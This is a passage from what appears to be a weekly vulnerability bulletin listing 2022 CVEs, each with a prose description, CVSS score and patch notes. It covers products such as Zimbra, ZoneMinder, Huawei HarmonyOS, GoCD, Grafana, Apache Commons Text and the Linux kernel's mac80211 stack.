tenda — ax1803_firmware Tenda AX1803 US_AX1803v2.0br_v1.0.0.1_2994_CN_ZGYD01_4 is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolReboot. 2022-10-12 6.5 CVE-2022-42087
MISC
tiny-csrf_project — tiny-csrf tiny-csrf is a Node.js cross site request forgery (CSRF) protection middleware. In versions prior to 1.1.0 cookies were not encrypted and thus CSRF tokens were transmitted in the clear. This issue has been addressed in commit `8eead6d` and the patch will be included in version 1.1.0. Users are advised to upgrade. There are no known workarounds for this issue. 2022-10-07 6.5 CVE-2022-39287
CONFIRM
MISC
totaljs — total.js A cross-site scripting (XSS) vulnerability in TotalJS commit 8c2c8909 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website name text field under Main Settings. 2022-10-07 5.4 CVE-2022-41392
MISC
MISC
MISC
trendmicro — apex_one A registry permissions vulnerability in the Trend Micro Apex One Data Loss Prevention (DLP) module could allow a local attacker with administrative credentials to bypass certain elements of the product’s anti-tampering mechanisms on affected installations. Please note: an attacker must first obtain administrative credentials on the target system in order to exploit this vulnerability. 2022-10-10 6.7 CVE-2022-41748
MISC
vanderbilt — redcap A reflected XSS vulnerability exists in REDCap before 12.04.18 in the Alerts & Notifications upload feature. A crafted CSV file will, when uploaded, trigger arbitrary JavaScript code execution. 2022-10-12 6.1 CVE-2022-42715
MISC
MISC
MISC
vmware — esxi VMware ESXi contains a null-pointer dereference vulnerability. A malicious actor with privileges within the VMX process only, may create a denial of service condition on the host. 2022-10-07 6.5 CVE-2022-31681
MISC
vmware — vrealize_operations VMware Aria Operations contains an arbitrary file read vulnerability. A malicious actor with administrative privileges may be able to read arbitrary files containing sensitive data. 2022-10-11 4.9 CVE-2022-31682
MISC
web-based_student_clearance_system_project — web-based_student_clearance_system A vulnerability was found in SourceCodester Web-Based Student Clearance System. It has been rated as problematic. Affected by this issue is the function prepare of the file /Admin/add-student.php. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-210356. 2022-10-08 5.4 CVE-2022-3434
N/A
N/A
webgilde — advanced_comment_form The Advanced Comment Form WordPress plugin before 1.2.1 does not sanitise and escape its settings, allowing high privilege users such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. 2022-10-10 4.8 CVE-2022-3220
MISC
wpchill — download_monitor The Download Monitor WordPress plugin before 4.5.98 does not ensure that files to be downloaded are inside the blog folders, and not sensitive, allowing high privilege users such as admin to download the wp-config.php or /etc/passwd even in a hardened environment or multisite setup. 2022-10-10 4.9 CVE-2022-2981
MISC
wpdarko — top_bar The Top Bar WordPress plugin before 3.0.4 does not sanitise and escape some of its settings before outputting them in frontend pages, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2022-10-10 4.8 CVE-2022-2629
MISC
wpsocialrocket — social_rocket The Social Rocket WordPress plugin before 1.3.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2022-10-10 4.8 CVE-2022-3136
MISC
wpwhitesecurity — wp_2fa The WP 2FA WordPress plugin before 2.3.0 uses comparison operators that don’t mitigate time-based attacks, which could be abused to leak information about the authentication codes being compared. 2022-10-10 5.9 CVE-2022-2891
MISC
xen — xapi XAPI open file limit DoS It is possible for an unauthenticated client on the network to cause XAPI to hit its file-descriptor limit. This causes XAPI to be unable to accept new requests for other (trusted) clients, and blocks XAPI from carrying out any tasks that require the opening of file descriptors. 2022-10-11 5.3 CVE-2022-33749
MISC
CONFIRM
MLIST
xen — xen P2M pool freeing may take excessively long The P2M pool backing second level address translation for guests may be of significant size. Therefore its freeing may take more time than is reasonable without intermediate preemption checks. Such checking for the need to preempt was so far missing. 2022-10-11 6.5 CVE-2022-33746
MISC
CONFIRM
MLIST
xen — xen lock order inversion in transitive grant copy handling As part of XSA-226 a missing cleanup call was inserted on an error handling path. While doing so, locking requirements were not paid attention to. As a result two cooperating guests granting each other transitive grants can cause locks to be acquired nested within one another, but in respectively opposite order. With suitable timing between the involved grant copy operations this may result in the locking up of a CPU. 2022-10-11 5.6 CVE-2022-33748
MISC
CONFIRM
MLIST
zimbra — collaboration An issue was discovered in Zimbra Collaboration (ZCS) 9.0. XSS can occur via the onerror attribute of an IMG element, leading to information disclosure. 2022-10-12 6.1 CVE-2022-41348
MISC
MISC
zimbra — collaboration In Zimbra Collaboration Suite (ZCS) 8.8.15, the URL at /h/compose accepts an attachUrl parameter that is vulnerable to Reflected XSS. This allows executing arbitrary JavaScript on the victim’s machine. 2022-10-12 6.1 CVE-2022-41349
MISC
MISC
zimbra — collaboration In Zimbra Collaboration Suite (ZCS) 8.8.15, /h/search?action=voicemail&action=listen accepts a phone parameter that is vulnerable to Reflected XSS. This allows executing arbitrary JavaScript on the victim’s machine. 2022-10-12 6.1 CVE-2022-41350
MISC
MISC
zimbra — collaboration In Zimbra Collaboration Suite (ZCS) 8.8.15, at the URL /h/calendar, one can trigger XSS by adding JavaScript code to the view parameter and changing the value of the uncheck parameter to a string (instead of default value of 10). 2022-10-12 6.1 CVE-2022-41351
MISC
MISC
zoneminder — zoneminder ZoneMinder is a free, open source Closed-circuit television software application. In affected versions authenticated users can bypass CSRF keys by modifying the request supplied to the Zoneminder web application. These modifications include replacing HTTP POST with an HTTP GET and removing the CSRF key from the request. An attacker can take advantage of this by using an HTTP GET request to perform actions with no CSRF protection. This could allow an attacker to cause an authenticated user to perform unexpected actions on the web application. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue. 2022-10-07 6.5 CVE-2022-39290
CONFIRM
MISC
zoneminder — zoneminder ZoneMinder is a free, open source Closed-circuit television software application. The file parameter is vulnerable to a cross site scripting vulnerability (XSS) by backing out of the current “tr” “td” brackets. This then allows a malicious user to provide code that will execute when a user views the specific log on the “view=log” page. This vulnerability allows an attacker to store code within the logs that will be executed when loaded by a legitimate user. These actions will be performed with the permission of the victim. This could lead to data loss and/or further exploitation including account takeover. This issue has been addressed in versions `1.36.27` and `1.37.24`. Users are advised to upgrade. Users unable to upgrade should disable database logging. 2022-10-07 5.4 CVE-2022-39285
MISC
MISC
CONFIRM
zoneminder — zoneminder ZoneMinder is a free, open source Closed-circuit television software application. Affected versions of zoneminder are subject to a vulnerability which allows users with “View” system permissions to inject new data into the logs stored by Zoneminder. This was observed through an HTTP POST request containing log information to the “/zm/index.php” endpoint. Submission is not rate controlled and could affect database performance and/or consume all storage resources. Users are advised to upgrade. There are no known workarounds for this issue. 2022-10-07 5.4 CVE-2022-39291
MISC
MISC
MISC
CONFIRM
MISC


Low Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
google — android Improper restriction of broadcasting Intent in MouseNKeyHidDevice prior to SMR Oct-2022 Release 1 leaks MAC address of the connected Bluetooth device. 2022-10-07 3.3 CVE-2022-36868
MISC
google — android Improper access control vulnerability in CocktailBarService prior to SMR Oct-2022 Release 1 allows local attacker to bind service that require BIND_REMOTEVIEWS permission. 2022-10-07 3.3 CVE-2022-39851
MISC
huawei — harmonyos The phones have the heap overflow, out-of-bounds read, and null pointer vulnerabilities in the fingerprint trusted application (TA). Successful exploitation of this vulnerability may affect the fingerprint service. 2022-10-14 3.4 CVE-2022-41592
MISC
MISC
huawei — harmonyos The phones have the heap overflow, out-of-bounds read, and null pointer vulnerabilities in the fingerprint trusted application (TA). Successful exploitation of this vulnerability may affect the fingerprint service. 2022-10-14 3.4 CVE-2022-41593
MISC
MISC
huawei — harmonyos The phones have the heap overflow, out-of-bounds read, and null pointer vulnerabilities in the fingerprint trusted application (TA). Successful exploitation of this vulnerability may affect the fingerprint service. 2022-10-14 3.4 CVE-2022-41594
MISC
MISC
huawei — harmonyos The phones have the heap overflow, out-of-bounds read, and null pointer vulnerabilities in the fingerprint trusted application (TA). Successful exploitation of this vulnerability may affect the fingerprint service. 2022-10-14 3.4 CVE-2022-41595
MISC
MISC
huawei — harmonyos The phones have the heap overflow, out-of-bounds read, and null pointer vulnerabilities in the fingerprint trusted application (TA). Successful exploitation of this vulnerability may affect the fingerprint service. 2022-10-14 3.4 CVE-2022-41597
MISC
MISC
huawei — harmonyos The phones have the heap overflow, out-of-bounds read, and null pointer vulnerabilities in the fingerprint trusted application (TA). Successful exploitation of this vulnerability may affect the fingerprint service. 2022-10-14 3.4 CVE-2022-41598
MISC
MISC
huawei — harmonyos The phones have the heap overflow, out-of-bounds read, and null pointer vulnerabilities in the fingerprint trusted application (TA). Successful exploitation of this vulnerability may affect the fingerprint service. 2022-10-14 3.4 CVE-2022-41600
MISC
MISC
huawei — harmonyos The phones have the heap overflow, out-of-bounds read, and null pointer vulnerabilities in the fingerprint trusted application (TA). Successful exploitation of this vulnerability may affect the fingerprint service. 2022-10-14 3.4 CVE-2022-41601
MISC
MISC
huawei — harmonyos The phones have the heap overflow, out-of-bounds read, and null pointer vulnerabilities in the fingerprint trusted application (TA). Successful exploitation of this vulnerability may affect the fingerprint service. 2022-10-14 3.4 CVE-2022-41602
MISC
MISC
huawei — harmonyos The phones have the heap overflow, out-of-bounds read, and null pointer vulnerabilities in the fingerprint trusted application (TA). Successful exploitation of this vulnerability may affect the fingerprint service. 2022-10-14 3.4 CVE-2022-41603
MISC
MISC
microsoft — windows_server_2008 Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37988, CVE-2022-37990, CVE-2022-37991, CVE-2022-37995, CVE-2022-38037, CVE-2022-38038, CVE-2022-38039. 2022-10-11 3.3 CVE-2022-38022
MISC
samsung — factorycamera Unprotected Receiver in AtBroadcastReceiver in FactoryCamera prior to version 3.5.51 allows attackers to record video without camera privilege. 2022-10-07 3.3 CVE-2022-39861
MISC
samsung — quick_share Improper access control vulnerability in QuickShare prior to version 13.2.3.5 allows attackers to access sensitive information via implicit broadcast. 2022-10-07 3.5 CVE-2022-39860
MISC
samsung — reminder Insertion of Sensitive Information into Log in PushRegIdUpdateClient of SReminder prior to 8.2.01.13 allows attacker to access device IMEI. 2022-10-07 3.3 CVE-2022-39876
MISC
samsung — sharelive Improper restriction of broadcasting Intent in ShareLive prior to version 13.2.03.5 leaks MAC address of the connected Bluetooth device. 2022-10-07 3.3 CVE-2022-39872
MISC
xen — xen Arm: unbounded memory consumption for 2nd-level page tables Certain actions require e.g. removing pages from a guest’s P2M (Physical-to-Machine) mapping. When large pages are in use to map guest pages in the 2nd-stage page tables, such a removal operation may incur a memory allocation (to replace a large mapping with individual smaller ones). These memory allocations are taken from the global memory pool. A malicious guest might be able to cause the global memory pool to be exhausted by manipulating its own P2M mappings. 2022-10-11 3.8 CVE-2022-33747
MISC
CONFIRM
MLIST


Severity Not Yet Assigned

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
389-ds-base — 389-ds-base A flaw was found In 389-ds-base. When the Content Synchronization plugin is enabled, an authenticated user can reach a NULL pointer dereference using a specially crafted query. This flaw allows an authenticated attacker to cause a denial of service. This CVE is assigned against an incomplete fix of CVE-2021-3514. 2022-10-14 not yet calculated CVE-2022-2850
MISC
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, the vulnerability is triggered when a crafted network packet is sent to the server. 2022-10-14 not yet calculated CVE-2022-35690
MISC
adobe — dimension Adobe Dimension versions 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 not yet calculated CVE-2022-38444
MISC
adobe — dimension Adobe Dimension versions 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 not yet calculated CVE-2022-38445
MISC
apache — apache_commons_text Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is “${prefix:name}”, where “prefix” is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: – “script” – execute expressions using the JVM script execution engine (javax.script) – “dns” – resolve dns records – “url” – load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default. 2022-10-13 not yet calculated CVE-2022-42889
CONFIRM
MLIST
apache — kylin Kylin’s cube designer function has a command injection vulnerability when overwriting system parameters in the configuration overwrites menu. RCE can be implemented by closing the single quotation marks around the parameter value of “-- conf=” to inject any operating system command into the command line parameters. This vulnerability affects Kylin 2 version 2.6.5 and earlier, Kylin 3 version 3.1.2 and earlier, and Kylin 4 version 4.0.1 and earlier. 2022-10-13 not yet calculated CVE-2022-24697
CONFIRM
atlassian — jira The ManageJiraConnectors API in Atlassian Jira Align before version 10.109.2 allows remote attackers to exploit this issue to access internal network resources via a Server-Side Request Forgery. This can be exploited by a remote, unauthenticated attacker with Super Admin privileges by sending a specially crafted HTTP request. 2022-10-14 not yet calculated CVE-2022-36802
MISC
atlassian — jira The MasterUserEdit API in Atlassian Jira Align Server before version 10.109.2 allows an authenticated attacker with the People role permission to use the MasterUserEdit API to modify any user’s role to Super Admin. This vulnerability was reported by Jacob Shafer from Bishop Fox. 2022-10-14 not yet calculated CVE-2022-36803
MISC
autodesk — design_review A maliciously crafted PCT file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. 2022-10-14 not yet calculated CVE-2022-41306
MISC
autodesk — fbx_sdk An Out-Of-Bounds Read Vulnerability in Autodesk FBX SDK version 2020. and prior may lead to code execution or information disclosure through maliciously crafted FBX files. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. 2022-10-14 not yet calculated CVE-2022-41302
MISC
autodesk — fbx_sdk A user may be tricked into opening a malicious FBX file which may exploit a use-after-free vulnerability in Autodesk FBX SDK 2020 version causing the application to reference a memory location controlled by an unauthorized third party, thereby running arbitrary code on the system. 2022-10-14 not yet calculated CVE-2022-41303
MISC
autodesk — fbx_sdk An Out-Of-Bounds Write Vulnerability in Autodesk FBX SDK 2020 version and prior may lead to code execution through maliciously crafted FBX files or information disclosure. 2022-10-14 not yet calculated CVE-2022-41304
MISC
autodesk — subassembly_composer A maliciously crafted PKT file when consumed through SubassemblyComposer.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. 2022-10-14 not yet calculated CVE-2022-41305
MISC
autodesk — subassembly_composer A maliciously crafted PKT file when consumed through SubassemblyComposer.exe application could lead to memory corruption vulnerability by read access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. 2022-10-14 not yet calculated CVE-2022-41307
MISC
autodesk — subassembly_composer A maliciously crafted PKT file when consumed through SubassemblyComposer.exe application could lead to memory corruption vulnerability by read access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. 2022-10-14 not yet calculated CVE-2022-41308
MISC
d-link_covr — d-link_covr D-Link COVR 1200,1202,1203 v1.08 was discovered to have a predictable seed in a Pseudo-Random Number Generator. 2022-10-13 not yet calculated CVE-2022-42159
MISC
MISC
d-link_covr — d-link_covr D-Link COVR 1200,1202,1203 v1.08 was discovered to contain a command injection vulnerability via the /SetTriggerWPS/PIN parameter at function SetTriggerWPS. 2022-10-13 not yet calculated CVE-2022-42161
MISC
MISC
d-link_covr — d-link_covr D-Link COVR 1200,1203 v1.08 was discovered to contain a command injection vulnerability via the tomography_ping_number parameter at function SetNetworkTomographySettings. 2022-10-13 not yet calculated CVE-2022-42156
MISC
MISC
d-link_covr — d-link_covr D-Link COVR 1200,1202,1203 v1.08 was discovered to contain a command injection vulnerability via the system_time_timezone parameter at function SetNTPServerSettings. 2022-10-13 not yet calculated CVE-2022-42160
MISC
MISC
gitee — openharmony OpenHarmony-v3.1.2 and prior versions, 3.0.6 and prior versions have a Kernel memory pool override vulnerability in /dev/mmz_userdev device driver. The impact depends on the privileges of the attacker. The unprivileged process run on the device could disclose sensitive information including kernel pointer, which could be used in further attacks. The processes with system user UID run on the device would be able to mmap memory pools used by kernel and override them which could be used to gain kernel code execution on the device, gain root privileges, or cause device reboot. 2022-10-14 not yet calculated CVE-2022-42464
MISC
gitee — openharmony OpenHarmony-v3.1.2 and prior versions have a Missing permission validation vulnerability in param service of startup subsystem. A malicious application installed on the device could elevate its privileges to the root user, disable security features, or cause DoS by disabling particular services. 2022-10-14 not yet calculated CVE-2022-42488
MISC
gitee — openharmony OpenHarmony-v3.1.2 and prior versions, 3.0.6 and prior versions have an Out-of-bound memory read and write vulnerability in /dev/mmz_userdev device driver. The impact depends on the privileges of the attacker. The unprivileged process run on the device could read out-of-bound memory leading to sensitive information disclosure. The processes with system user UID run on the device would be able to write out-of-bound memory which could lead to unspecified memory corruption. 2022-10-14 not yet calculated CVE-2022-41686
MISC
gitee — openharmony OpenHarmony-v3.1.2 and prior versions have an authentication bypass vulnerability in a callback handler function of Softbus_server in communication subsystem. Attackers can launch attacks on distributed networks by sending Bluetooth rfcomm packets to any remote device and executing arbitrary commands. 2022-10-14 not yet calculated CVE-2022-42463
MISC
go — parseacceptlanguage An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse. 2022-10-14 not yet calculated CVE-2022-32149
MISC
MISC
MISC
MISC
go — reader.read Reader.Read does not set a limit on the maximum size of file headers. A maliciously crafted archive could cause Read to allocate unbounded amounts of memory, potentially causing resource exhaustion or panics. After fix, Reader.Read limits the maximum size of header blocks to 1 MiB. 2022-10-14 not yet calculated CVE-2022-2879
MISC
MISC
MISC
MISC
go — reverseproxy Requests forwarded by ReverseProxy include the raw query parameters from the inbound request, including unparseable parameters rejected by net/http. This could permit query parameter smuggling when a Go proxy forwards a parameter with an unparseable value. After fix, ReverseProxy sanitizes the query parameters in the forwarded query when the outbound request’s Form field is set after the ReverseProxy.Director function returns, indicating that the proxy has parsed the query parameters. Proxies which do not parse query parameters continue to forward the original query parameters unchanged. 2022-10-14 not yet calculated CVE-2022-2880
MISC
MISC
MISC
MISC
gocd — gocd GoCD is a continuous delivery server. GoCD helps you automate and streamline the build-test-release cycle for continuous delivery of your product. GoCD versions from 19.2.0 to 19.10.0 (inclusive) are subject to a timing attack in validation of access tokens due to use of regular string comparison for validation of the token rather than a constant time algorithm. This could allow a brute force attack on GoCD server API calls to observe timing differences in validations in order to guess an access token generated by a user for API access. This issue is fixed in GoCD version 19.11.0. As a workaround, users can apply rate limiting or insert random delays to API calls made to GoCD Server via a reverse proxy or other fronting web server. As another workaround, users may disallow use of access tokens by users by having an administrator revoke all access tokens through the “Access Token Management” admin function. 2022-10-14 not yet calculated CVE-2022-39308
MISC
MISC
MISC
CONFIRM
gocd — gocd GoCD is a continuous delivery server. GoCD helps you automate and streamline the build-test-release cycle for continuous delivery of your product. GoCD versions prior to 21.1.0 are vulnerable to remote code execution on the server from a malicious or compromised agent. The Spring RemoteInvocation endpoint exposed agent communication and allowed deserialization of arbitrary java objects, as well as subsequent remote code execution. Exploitation requires agent-level authentication, thus an attacker would need to either compromise an existing agent, its network communication or register a new agent to practically exploit this vulnerability. This issue is fixed in GoCD version 21.1.0. There are currently no known workarounds. 2022-10-14 not yet calculated CVE-2022-39311
CONFIRM
MISC
MISC
gocd — gocd GoCD is a continuous delivery server. GoCD helps you automate and streamline the build-test-release cycle for continuous delivery of your product. GoCD versions prior to 21.1.0 leak the symmetric key used to encrypt/decrypt any secure variables/secrets in GoCD configuration to authenticated agents. A malicious/compromised agent may then expose that key from memory, and potentially allow an attacker the ability to decrypt secrets intended for other agents/environments if they also are able to obtain access to encrypted configuration values from the GoCD server. This issue is fixed in GoCD version 21.1.0. There are currently no known workarounds. 2022-10-14 not yet calculated CVE-2022-39309
MISC
MISC
CONFIRM
MISC
gocd — gocd GoCD is a continuous delivery server. GoCD helps you automate and streamline the build-test-release cycle for continuous delivery of your product. GoCD versions prior to 21.1.0 can allow one authenticated agent to impersonate another agent, and thus receive work packages for other agents due to broken access control and incorrect validation of agent tokens within the GoCD server. Since work packages can contain sensitive information such as credentials intended only for a given job running against a specific agent environment, this can cause accidental information disclosure. Exploitation requires knowledge of agent identifiers and ability to authenticate as an existing agent with the GoCD server. This issue is fixed in GoCD version 21.1.0. There are currently no known workarounds. 2022-10-14 not yet calculated CVE-2022-39310
MISC
MISC
CONFIRM
grafana — grafana Grafana is an open source observability and data visualization platform. Starting with version 5.0.0-beta1 and prior to versions 8.5.14 and 9.1.8, Grafana could leak the authentication cookie of users to plugins. The vulnerability impacts data source and plugin proxy endpoints under certain conditions. The destination plugin could receive a user’s Grafana authentication cookie. Versions 9.1.8 and 8.5.14 contain a patch for this issue. There are no known workarounds. 2022-10-13 not yet calculated CVE-2022-39201
CONFIRM
MISC
MISC
MISC
grafana — grafana Grafana is an open source data visualization platform for metrics, logs, and traces. Versions prior to 9.1.8 and 8.5.14 allow one user to block another user’s login attempt by registering someone else’s email address as a username. A Grafana user’s username and email address are unique fields, that means no other user can have the same username or email address as another user. A user can have an email address as a username. However, the login system allows users to log in with either username or email address. Since Grafana allows a user to log in with either their username or email address, this creates an unusual behavior where `user_1` can register with one email address and `user_2` can register their username as `user_1`’s email address. This prevents `user_1` logging into the application since `user_1`’s password won’t match with `user_2`’s email address. Versions 9.1.8 and 8.5.14 contain a patch. There are no workarounds for this issue. 2022-10-13 not yet calculated CVE-2022-39229
MISC
MISC
CONFIRM
huawei — harmonyos The HwAirlink module has a heap overflow vulnerability.Successful exploitation of this vulnerability may cause out-of-bounds writes, resulting in modification of sensitive data. 2022-10-14 not yet calculated CVE-2022-38977
MISC
huawei — harmonyos The HwAirlink module has a heap overflow vulnerability in processing data packets of the proprietary protocol.Successful exploitation of this vulnerability may allow attackers to obtain process control permissions. 2022-10-14 not yet calculated CVE-2022-38980
MISC
huawei — harmonyos The HwAirlink module has an out-of-bounds read vulnerability. Successful exploitation of this vulnerability may cause information leakage. 2022-10-14 not yet calculated CVE-2022-38981
MISC
huawei — harmonyos The fingerprint module has service logic errors. Successful exploitation of this vulnerability will cause the phone lock to be cracked. 2022-10-14 not yet calculated CVE-2022-38982
MISC
huawei — harmonyos The BT Hfp Client module has a Use-After-Free (UAF) vulnerability. Successful exploitation of this vulnerability may result in arbitrary code execution. 2022-10-14 not yet calculated CVE-2022-38983
MISC
MISC
huawei — harmonyos The HIPP module has a vulnerability of not verifying the data transferred in the kernel space. Successful exploitation of this vulnerability will cause out-of-bounds read, which affects data confidentiality. 2022-10-14 not yet calculated CVE-2022-38984
MISC
MISC
huawei — harmonyos The facial recognition module has a vulnerability in input validation. Successful exploitation of this vulnerability may affect data confidentiality. 2022-10-14 not yet calculated CVE-2022-38985
MISC
MISC
huawei — harmonyos The HIPP module has a vulnerability of bypassing the check of the data transferred in the kernel space. Successful exploitation of this vulnerability may cause out-of-bounds access to the HIPP module and page table tampering, affecting device confidentiality and availability. 2022-10-14 not yet calculated CVE-2022-38986
MISC
MISC
huawei — harmonyos The HISP module has a vulnerability of bypassing the check of the data transferred in the kernel space. Successful exploitation of this vulnerability may cause unauthorized access to the HISP module. 2022-10-14 not yet calculated CVE-2022-39011
MISC
MISC
huawei — harmonyos The HW_KEYMASTER module has a vulnerability of missing bounds check on length. Successful exploitation of this vulnerability may cause malicious construction of data, which results in out-of-bounds access. 2022-10-14 not yet calculated CVE-2021-46839
MISC
MISC
huawei — harmonyos The HW_KEYMASTER module has an out-of-bounds access vulnerability in parameter set verification. Successful exploitation of this vulnerability may cause malicious construction of data, which results in out-of-bounds access. 2022-10-14 not yet calculated CVE-2021-46840
MISC
MISC
huawei — harmonyos The HISP module has a vulnerability of not verifying the data transferred in the kernel space. Successful exploitation of this vulnerability will cause out-of-bounds read, which affects data confidentiality. 2022-10-14 not yet calculated CVE-2022-38998
MISC
MISC
huawei — emui/magic_ui The MPTCP module has an out-of-bounds write vulnerability. Successful exploitation of this vulnerability may cause root privilege escalation attacks implemented by modifying program information. 2022-10-14 not yet calculated CVE-2022-41578
MISC
MISC
huawei — emui/magic_ui The HW_KEYMASTER module has a vulnerability of not verifying the data read. Successful exploitation of this vulnerability may cause malicious construction of data, which results in out-of-bounds access. 2022-10-14 not yet calculated CVE-2022-41580
MISC
MISC
huawei — emui/magic_ui The storage maintenance and debugging module has an array out-of-bounds read vulnerability. Successful exploitation of this vulnerability will cause incorrect statistics of this module. 2022-10-14 not yet calculated CVE-2022-41583
MISC
MISC
huawei — emui/magic_ui The kernel module has an out-of-bounds read vulnerability. Successful exploitation of this vulnerability may cause memory overwriting. 2022-10-14 not yet calculated CVE-2022-41584
MISC
MISC
huawei — emui/magic_ui The kernel module has an out-of-bounds read vulnerability. Successful exploitation of this vulnerability may cause memory overwriting. 2022-10-14 not yet calculated CVE-2022-41585
MISC
MISC
huawei — emui/magic_ui The communication framework module has a vulnerability of not truncating data properly. Successful exploitation of this vulnerability may affect data confidentiality. 2022-10-14 not yet calculated CVE-2022-41586
MISC
MISC
huawei — emui/magic_ui Uncaptured exceptions in the home screen module. Successful exploitation of this vulnerability may affect stability. 2022-10-14 not yet calculated CVE-2022-41587
MISC
huawei — emui/magic_ui The home screen module has a vulnerability in service logic processing. Successful exploitation of this vulnerability may affect data integrity. 2022-10-14 not yet calculated CVE-2022-41588
MISC
MISC
huawei — emui/magic_ui The DFX unwind stack module of the ArkCompiler has a vulnerability in interface calling. Successful exploitation of this vulnerability affects system services and device availability. 2022-10-14 not yet calculated CVE-2022-41589
MISC
MISC
huawei — emui/magic_ui The HW_KEYMASTER module has a vulnerability of not verifying the data read. Successful exploitation of this vulnerability may cause malicious construction of data, which results in out-of-bounds access. 2022-10-14 not yet calculated CVE-2022-41581
MISC
MISC
huawei — emui/magic_ui The security module has configuration defects. Successful exploitation of this vulnerability may affect system availability. 2022-10-14 not yet calculated CVE-2022-41582
MISC
MISC
ikea — tradfri_smart_lights An attacker sending a single malformed IEEE 802.15.4 (Zigbee) frame makes the TRÅDFRI bulb blink, and if they replay (i.e. resend) the same frame multiple times, the bulb performs a factory reset. This causes the bulb to lose configuration information about the Zigbee network and current brightness level. After this attack, all lights are on with full brightness, and a user cannot control the bulbs with either the IKEA Home Smart app or the TRÅDFRI remote control. The malformed Zigbee frame is an unauthenticated broadcast message, which means all vulnerable devices within radio range are affected. CVSS 3.1 Base Score 7.1 vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H 2022-10-14 not yet calculated CVE-2022-39064
MISC
ikea — tradfri_smart_lights A single malformed IEEE 802.15.4 (Zigbee) frame makes the TRÅDFRI gateway unresponsive, such that connected lighting cannot be controlled with the IKEA Home Smart app and TRÅDFRI remote control. The malformed Zigbee frame is an unauthenticated broadcast message, which means all vulnerable devices within radio range are affected. CVSS 3.1 Base Score: 6.5 Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 2022-10-14 not yet calculated CVE-2022-39065
MISC
istio — istiod Istio is an open platform-independent service mesh that provides traffic management, policy enforcement, and telemetry collection. Prior to versions 1.15.2, 1.14.5, and 1.13.9, the Istio control plane, istiod, is vulnerable to a request processing error: a malicious attacker who sends a specially crafted or oversized message can crash the control plane when the Kubernetes validating or mutating webhook service is exposed publicly. This endpoint is served over TLS port 15017, but does not require any authentication from the attacker. For simple installations, Istiod is typically only reachable from within the cluster, limiting the blast radius. However, for some deployments, especially external istiod topologies, this port is exposed over the public internet. Versions 1.15.2, 1.14.5, and 1.13.9 contain patches for this issue. There are no effective workarounds, beyond upgrading. This bug is due to an error in `regexp.Compile` in Go. 2022-10-13 not yet calculated CVE-2022-39278
MISC
CONFIRM
MISC
MISC
jasper — jasper A vulnerability was found in jasper. It is caused by a memory leak bug in the function cmdopts_parse that can cause a crash or segmentation fault. 2022-10-14 not yet calculated CVE-2022-2963
MISC
MISC
MISC
liferay — digital_experience_platform A Cross-site scripting (XSS) vulnerability in the Blog module – add new topic functionality in Liferay Digital Experience Platform 7.3.10 SP3 allows remote attackers to inject arbitrary JS script or HTML into the name field of newly created topic. 2022-10-13 not yet calculated CVE-2022-38902
MISC
MISC
MISC
linux — linux_kernel Various refcounting bugs in the multi-BSS handling in the mac80211 stack in the Linux kernel 5.1 through 5.19.x before 5.19.16 could be used by local attackers (able to inject WLAN frames) to trigger use-after-free conditions to potentially execute code. 2022-10-14 not yet calculated CVE-2022-42720
MISC
MISC
MISC
FEDORA
FEDORA
linux — linux_kernel A list management bug in BSS handling in the mac80211 stack in the Linux kernel 5.1 through 5.19.x before 5.19.16 could be used by local attackers (able to inject WLAN frames) to corrupt a linked list and, in turn, potentially execute code. 2022-10-14 not yet calculated CVE-2022-42721
MISC
MISC
MISC
FEDORA
FEDORA
linux — linux_kernel An issue was discovered in the Linux kernel before 5.19.16. Attackers able to inject WLAN frames could cause a buffer overflow in the ieee80211_bss_info_update function in net/mac80211/scan.c. 2022-10-14 not yet calculated CVE-2022-41674
MISC
MISC
MISC
MISC
MISC
FEDORA
FEDORA
linux — linux_kernel A use-after-free in the mac80211 stack when parsing a multi-BSSID element in the Linux kernel 5.2 through 5.19.x before 5.19.16 could be used by attackers (able to inject WLAN frames) to crash the kernel and potentially execute code. 2022-10-13 not yet calculated CVE-2022-42719
MISC
MISC
MISC
MISC
FEDORA
FEDORA
